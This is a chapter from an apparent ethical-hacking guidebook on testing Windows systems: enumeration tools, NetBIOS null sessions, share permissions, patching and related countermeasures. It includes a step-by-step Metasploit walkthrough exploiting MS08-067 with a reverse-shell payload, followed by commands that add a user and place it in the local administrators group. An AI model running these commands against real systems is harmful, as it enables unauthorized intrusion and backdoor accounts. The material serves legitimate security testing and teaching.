Free Microsoft tools

You can use the following free Microsoft tools to test your systems for various weaknesses:

• Built-in Windows programs for NetBIOS and TCP/UDP service enumeration, such as these three:
  • nbtstat for gathering NetBIOS name table information
  • netstat for displaying open ports on the local Windows system
  • net for running various network-based commands, including viewing shares on remote Windows systems and adding user accounts after you gain a remote command prompt via Metasploit
• Microsoft Baseline Security Analyzer (MBSA) (https://technet.microsoft.com/en-us/security/cc184924.aspx) to test for missing patches and basic Windows security settings
• Sysinternals (http://technet.microsoft.com/en-us/sysinternals/default.aspx) to poke, prod, and monitor Windows services, processes, and resources both locally and over the network

All-in-one assessment tools

All-in-one tools perform a wide variety of security tests, including the following:

• Port scanning
• OS fingerprinting
• Basic password cracking
• Detailed vulnerability mappings of the various security weaknesses that the tools find on your Windows systems

I typically use these tools in my work with very good results:

• GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)
• Nexpose (www.rapid7.com/products/nexpose)

Task-specific tools

The following tools perform more specific tasks for uncovering Windows-related security flaws. These tools provide detailed insight into your Windows systems and provide information that you might not otherwise get from all-in-one assessment tools:

• Metasploit (www.metasploit.com) for exploiting vulnerabilities that such tools as Nexpose and Qualys discover to obtain remote command prompts, add users, setup remote backdoors, and much more
• NetScanTools Pro (www.netscantools.com) for port scanning, ping sweeps, and share enumeration
• SoftPerfect Network Security Scanner (www.softperfect.com/products/networkscanner) for port scanning and share enumeration
• TCPView (http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx) to view TCP and UDP session information
• Winfo (www.ntsecurity.nu/toolbox/winfo) for null session enumeration to gather such configuration information as security policies, local user accounts, and shares

Keep in mind that disabling the Windows Firewall (or other third-party firewall that’s running on your test system) can help speed things up. Ditto for anti-virus software — just be careful. If possible, run your security tests using a dedicated system or virtual machine, because doing so minimizes any impact your test results may have on the other work you do on your computer.

System scanning

A few straightforward processes can identify weaknesses in Windows systems.

Testing

Start gathering information about your Windows systems by running an initial port scan:

1. Run basic scans to find which ports are open on each Windows system:

   Scan for TCP ports with a port scanning tool, such as NetScanTools Pro. The NetScanTools Pro results shown in Figure 12-1 reveal several potentially vulnerable ports open on a Windows 7 system, including those for DNS (UDP port 53); the ever-popular — and easily hacked — NetBIOS (port 139); and SQL Server (UDP 1434).

2. Perform OS enumeration (such as scanning for shares and specific OS versions) by using an all-in-one assessment tool, such as LanGuard.

   Figure 12-2 shows a LanGuard scan that reveals the server version, vulnerabilities, open ports, and more.

   As you can see, GFI ranks AutoRun-enabled and source-routed packets from arbitrary hosts as “High” Security Vulnerabilities. I discuss the subject of vulnerability prioritization in Chapter 17.

   If you need to quickly identify the specific version of Windows that’s running, you can use Nmap (http://nmap.org/download.html) with the -O option, as shown in Figure 12-3.

   Other OS fingerprinting tools are available, but I’ve found Nmap to be one of the most accurate.

3. Determine potential security vulnerabilities.

   This is subjective and might vary from system to system, but what you want to look for are interesting services and applications and proceed from there.

NetBIOS

You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN.

These Windows NetBIOS ports can be compromised if they aren’t properly secured:

• UDP ports for network browsing:
  • Port 137 (NetBIOS name services, also known as WINS)
  • Port 138 (NetBIOS datagram services)
• TCP ports for Server Message Block (SMB):
  • Port 139 (NetBIOS session services, also known as CIFS)
  • Port 445 (runs SMB over TCP/IP without NetBIOS)

Hacks

The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS.

Unauthenticated enumeration

When you’re performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems two ways:

• Using all-in-one scanners, such as LanGuard or Nexpose
• Using the nbtstat program that’s built in to Windows (nbtstat stands for NetBIOS over TCP/IP Statistics)

Figure 12-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.

nbtstat shows the remote computer’s NetBIOS name table, which you gather by using the nbtstat -A command. This displays the following information:

• Computer name
• Domain name
• Computer’s MAC address

An advanced program such as Nexpose isn’t necessary to gather this basic information from a Windows system. However, the graphical interface offered by commercial software such as this presents its findings in a prettier fashion and is often much easier to use. Additionally, you have the benefit of gathering the information you need with one tool.

Shares

Windows uses network shares to share certain folders or drives on the system so other users can access them across the network. Shares are easy to set up and provide a great way to share files with other users on the network without having to involve a server. However, they’re often misconfigured, allowing users, malware, and external attackers that have made their way inside the network to access information they shouldn’t be able to get to otherwise. You can search for Windows network shares by using the Share Finder tool built into LanGuard. This tool scans an entire range of IP addresses, looking for Windows shares, as shown in Figure 12-5.

The Everyone group has full share and file access to the LifeandHealth share on the THINKPAD host. I see situations like this all the time where someone shares their local drive so others can access it. The problem is they often forget to remove the permissions and leave a gaping hole for a security breach.

The shares displayed in Figure 12-5 are just what malicious insiders are looking for because the share names give a hint of what type of files might be accessible if they connect to the shares. After those with ill intent discover such shares, they’re likely to dig a little further to see whether they can browse and access the files within the shares. I cover shares and rooting out sensitive information on network shares later in this chapter and in Chapter 16.

Mapping

Follow these steps for each Windows computer to which you want to map a null session:

1. Format the basic net command, like this:

   net use \host_name_or_IP_addressipc$ "" "/user:"

   The net command to map null sessions requires these parameters:

   • net (the built-in Windows network command) followed by the use command
   • The IP address or hostname of the system to which you want to map a null connection

   • A blank password and username

     The blanks are why it’s called a null connection.

2. Press Enter to make the connection.

   Figure 12-6 shows an example of the complete command when mapping a null session. After you map the null session, you should see the message The command completed successfully.

To confirm that the sessions are mapped, enter this command at the command prompt:

net use

As shown in Figure 12-6, you should see the mappings to the IPC$ share on each computer to which you’re connected.

Gleaning information

With a null session connection, you can use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.

You — like a hacker — can take the output of these enumeration programs and attempt (as an unauthorized user) to

• Crack the passwords of the users found. (See Chapter 8 for more on password cracking.)
• Map drives to each computer’s network shares.

You can use the following applications for system enumeration against server versions of Windows prior to Server 2003 as well as Windows XP. Don’t laugh, I still see these archaic versions of Windows running.

net view

The net view command (see Figure 12-7) shows shares that the Windows host has available. You can use the output of this program to see information that the server is advertising to the world and what can be done with it, including the following:

• Share information that an attacker can use to exploit your systems, such as mapping drives and cracking share passwords.
• Share permissions that might need to be removed, such as the permission for the Everyone group, to at least see the share on older Windows 2000–based systems if you have those on your network.

Countermeasures against null session hacks

If it makes good business sense and the timing is right, upgrade to the more secure Windows Server 2012 or Windows Server 2016 as well as Windows 7 or Windows 10. They don’t have the vulnerabilities described in the following list.

You can easily prevent null session connection hacks by implementing one or more of the following security measures:

• Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
  • 139 (NetBIOS sessions services)
  • 445 (runs SMB over TCP/IP without NetBIOS)
• Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine’s network connection for those systems that don’t need it.

• Restrict anonymous connections to the system. If you happen to have any Windows NT and Windows 2000 systems left in your environment (hopefully not!), you can set HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSARestrictAnonymous to a DWORD value as follows:

  • None: This is the default setting.
  • Rely on Default Permissions (Setting 0): This setting allows the default null session connections.
  • Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
  • No Access without Explicit Anonymous Permissions (Setting 2): This high security setting prevents null session connections and system enumeration.

  High security creates problems for domain controller communication and network browsing, so be careful! You can end up crippling the network.

Microsoft Knowledge Base Article 246261 covers the caveats of using the high security setting for RestrictAnonymous. It’s available on the web at http://support.microsoft.com/default.aspx?scid=KB;en-us;246261.

For later versions of Windows, such as Windows Server 2008 R2 and Windows 7, ensure that the Network Access anonymous components of the local or group security policy are set as shown in Figure 12-8.

Windows defaults

The default share permission depends on the Windows system version.

Testing

Assessing your share permissions is a good way to get an overall view of who can access what. This testing shows how vulnerable your network shares — and sensitive information — can be. You can find shares with default permissions and unnecessary access rights enabled. Trust me; they’re everywhere!

The best way to test for share weaknesses is to log in to the Windows system via a standard local or domain user with no special privileges and run an enumeration program so you can see who has access to what.

As I outlined earlier, LanGuard has built-in share finder capabilities for uncovering unprotected shares, the options for which are shown in Figure 12-9.

I outline more details on uncovering sensitive information in unstructured files on network shares and other storage systems in Chapter 16.

Using Metasploit

After you find a vulnerability, the next step is to exploit it. In this example, I use Metasploit Framework (an open source tool owned and maintained by Rapid7) and obtain a remote command prompt on the vulnerable server. Here’s how:

1. Download and install Metasploit (currently at version 4.11) from www.rapid7.com/products/metasploit/download.jsp.

   I use the Windows version; all you have to do is download and run the executable.

2. After the installation is complete, run the Metasploit Console, which is Metasploit’s main console.

   There’s also a web-based version of Metasploit that you can access through your browser (Metasploit Web UI), but I prefer the console interface.

   You see a screen similar to the one shown in Figure 12-11.

3. Enter the exploit you wish to run. For example, if you want to run the Microsoft MS08-067 Plug and Play exploit, enter the following:

   use exploit/windows/smb/ms08_067_netapi

4. Enter the remote host (RHOST) you wish to target and the IP address of the local host (LHOST) you’re on with the following command:

   set RHOST ip_address
set LHOST ip_address

5. Set the target operating system (usually 0 for automatic targeting) with the following command:

   set TARGET 0

6. Set the payload (exploit data) that you want to execute. I typically choose windows/shell_reverse_tcp as it provides a remote command prompt on the system being exploited.

   Figure 12-12 shows what you should have displayed in the Metasploit console screen.

7. The final step is to simply enter exploit in the Metasploit console. This command invokes the final step where Metasploit delivers the payload to the target system. Assuming the exploit is successful, you should be presented a command prompt where you can enter typical DOS commands such as ‘dir’ as shown in Figure 12-13.

In this ironic example, a Mac is running Windows via the Boot Camp software. I now “own” the system and am able to do whatever I want. For example, one thing I commonly do is add a user account to the exploited system. You can actually do this within Metasploit (via the adduser payloads), but I prefer to do it on my own so I can get screenshots of my actions. To add a user, simply enter net user username password /add at the Metasploit command prompt.

Next, I add the user to the local administrators group by entering net localgroup administrators username /add at the Metasploit command prompt. You can then log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop.

If you choose to add a user account during this phase, be sure to remove it when you finish. Otherwise, you can create another vulnerability on the system — especially if the account has a weak password. Chapter 3 covers related issues, such as the need for a contract when performing your testing. You want to make sure you’ve covered yourself.

All in all, this is hacking at its finest!

Three unique versions of Metasploit are available from Rapid7. The free edition outlined in the preceding steps is called Metasploit Framework. It may be all you need if an occasional screenshot of remote access or similar is sufficient for your testing purposes. There’s also Metasploit Community which is accessible via a web user interface and intended for small networks. Finally, there’s a full-blown commercial version called Metasploit Pro for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.

Metasploit Pro’s Overview screen is shown in Figure 12-14. Note the workflow features in the Quick Start Wizards icons including Quick PenTest, Phishing Campaign, and Web App Test. It’s a well-thought-out interface that takes the pain out of traditional security scanning, exploitation, and reporting, which is especially useful for the less technical IT professional.

Metasploit Pro provides you with the ability to import scanner findings (typically XML files) from third-party vulnerability scanners such as Acunetix Web Vulnerability Scanner, Netsparker, and Nexpose. Simply click the name of your project in the Project Listing section (or create a new one by selecting New Project) and then clicking the Import button. After the scan data file is imported, you can click the Vulnerabilities tab and see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (assuming it’s a supported exploit in Metasploit Pro), simply click the finding under the Name column and you’ll be presented with a new page that allows you to click Exploit and execute the flaw, as shown in Figure 12-15.

Keep in mind that I’ve demonstrated only a fraction of what Metasploit Framework and Metasploit Pro can do. I highly recommend you download one or both and familiarize yourself with these tools. Numerous resources are available at www.metasploit.com/help that can help you take your skillset to the next level. The power of Metasploit is unbelievable all by itself. Combine it with the exploit code that’s continually updated at sites such as Offensive Security’s Exploits Database (www.exploit-db.com), and you have practically everything you need if you choose to drill down to that level of exploitation in your security testing.

Countermeasures against missing patch vulnerability exploits

Patch your systems — both the Windows OS and any Microsoft or third-party applications running on them. I know it’s a lot easier said than done. Seriously, that’s all there is to it. Combine that with the other hardening recommendations I provide in this chapter, and you have a pretty darned secure Windows environment.

To get your arms around the patching process, you have to automate it wherever you can. You can use Windows Update — or better yet — Windows Server Update Services (WSUS) for Microsoft-centric patches, which can be found at http://technet.microsoft.com/en-us/wsus/default.aspx. I can’t stress enough how you need to get your third-party patches for Adobe, Java, and so on under control. If you’re looking for a commercial alternative, check out GFI LanGuard’s patch management features (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) and Lumension Patch and Remediation (www.lumension.com/vulnerability-management/patch-management-software.aspx). I cover patching more in-depth in Chapter 18.